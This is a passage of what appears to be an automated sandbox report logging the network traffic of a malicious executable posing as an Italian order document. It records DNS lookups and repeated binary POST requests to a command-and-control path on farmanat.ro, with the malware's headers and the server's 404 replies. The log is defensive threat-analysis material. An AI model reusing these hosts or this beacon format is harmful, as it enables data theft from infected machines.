                                              Nov 25, 2021 10:48:01.080358982 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.080440998 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.113857031 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.683996916 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.717415094 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.717715979 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.719255924 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.752535105 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.752748013 CET4982280192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.786055088 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.885267019 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.885318995 CET8049822176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.885462046 CET4982280192.168.11.20176.223.209.128

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2021 10:47:50.042912960 CET6224253192.168.11.201.1.1.1
                                              Nov 25, 2021 10:47:51.052072048 CET6224253192.168.11.209.9.9.9
                                              Nov 25, 2021 10:47:51.302644014 CET53622421.1.1.1192.168.11.20
                                              Nov 25, 2021 10:47:51.432888031 CET53622429.9.9.9192.168.11.20
                                              Nov 25, 2021 10:47:53.898544073 CET6125853192.168.11.201.1.1.1
                                              Nov 25, 2021 10:47:54.168392897 CET53612581.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 25, 2021 10:47:50.042912960 CET192.168.11.201.1.1.10xa8afStandard query (0)fabricraft.co.zaA (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:51.052072048 CET192.168.11.209.9.9.90xa8afStandard query (0)fabricraft.co.zaA (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:53.898544073 CET192.168.11.201.1.1.10x3bd2Standard query (0)farmanat.roA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 25, 2021 10:47:51.302644014 CET1.1.1.1192.168.11.200xa8afNo error (0)fabricraft.co.za197.242.150.64A (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:51.432888031 CET9.9.9.9192.168.11.200xa8afNo error (0)fabricraft.co.za197.242.150.64A (IP address)IN (0x0001)
                                              Nov 25, 2021 10:47:54.168392897 CET1.1.1.1192.168.11.200x3bd2No error (0)farmanat.ro176.223.209.128A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • fabricraft.co.za
                                              • farmanat.ro

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049816197.242.150.64443C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.2049817176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:47:54.204528093 CET6223OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 178
                                              Connection: close
                                              Nov 25, 2021 10:47:54.380963087 CET6224INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:47:53 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              10192.168.11.2049845176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:06.992096901 CET6319OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:07.107255936 CET6319INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              100192.168.11.2049937176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              101192.168.11.2049938176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              102192.168.11.2049939176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              103192.168.11.2049940176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              104192.168.11.2049941176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              105192.168.11.2049942176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              106192.168.11.2049943176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              107192.168.11.2049944176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              108192.168.11.2049948176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              109192.168.11.2049949176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              11192.168.11.2049846176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:07.734355927 CET6321OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:07.818254948 CET6321INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              110192.168.11.2049950176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              111192.168.11.2049951176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              112192.168.11.2049952176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              113192.168.11.2049953176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              114192.168.11.2049954176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              115192.168.11.2049955176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              116192.168.11.2049956176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              117192.168.11.2049957176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              118192.168.11.2049958176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              119192.168.11.2049959176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              12192.168.11.2049847176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:08.418318987 CET6322OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:08.506304979 CET6323INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              120192.168.11.2049960176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              121192.168.11.2049961176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              122192.168.11.2049962176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              123192.168.11.2049964176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              124192.168.11.2049965176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              125192.168.11.2049966176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              126192.168.11.2049967176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              127192.168.11.2049968176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              128192.168.11.2049969176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              129192.168.11.2049970176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              13192.168.11.2049848176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:09.107460976 CET6323OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:09.192800045 CET6324INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              130192.168.11.2049971176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              131192.168.11.2049972176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              132192.168.11.2049973176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              133192.168.11.2049974176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              134192.168.11.2049975176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              135192.168.11.2049976176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              136192.168.11.2049977176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              137192.168.11.2049978176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              138192.168.11.2049979176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              139192.168.11.2049980176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              14192.168.11.2049849176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:09.857429981 CET6325OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:09.977329016 CET6325INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              140192.168.11.2049981176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              141192.168.11.2049982176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              142192.168.11.2049983176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              143192.168.11.2049984176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              144192.168.11.2049985176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              145192.168.11.2049986176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              146192.168.11.2049987176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              147192.168.11.2049988176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              148192.168.11.2049989176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              149192.168.11.2049990176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              15192.168.11.2049850176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:10.692074060 CET6326OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:10.784281969 CET6327INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              150192.168.11.2049991176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              151192.168.11.2049992176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              152192.168.11.2049993176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              153192.168.11.2049994176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              154192.168.11.2049995176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              155192.168.11.2049996176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              156192.168.11.2049997176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              157192.168.11.2049998176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              158192.168.11.2049999176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              159192.168.11.2050000176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              16192.168.11.2049851176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:11.469665051 CET6327OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:11.553739071 CET6328INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:10 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              160192.168.11.2050001176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              161192.168.11.2050002176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              162192.168.11.2050003176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              163192.168.11.2050004176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              164192.168.11.2050005176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              165192.168.11.2050006176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              166192.168.11.2050007176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              167192.168.11.2050008176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              168192.168.11.2050009176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              169192.168.11.2050010176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              17192.168.11.2049852176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:12.137739897 CET6329OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:12.222152948 CET6329INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:11 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              170192.168.11.2050011176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              171192.168.11.2050012176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              172192.168.11.2050013176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              173192.168.11.2050014176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              174192.168.11.2050015176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              175192.168.11.2050016176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              176192.168.11.2050017176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              177192.168.11.2050018176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              178192.168.11.2050019176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              179192.168.11.2050020176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              18192.168.11.2049853176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:12.876249075 CET6330OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
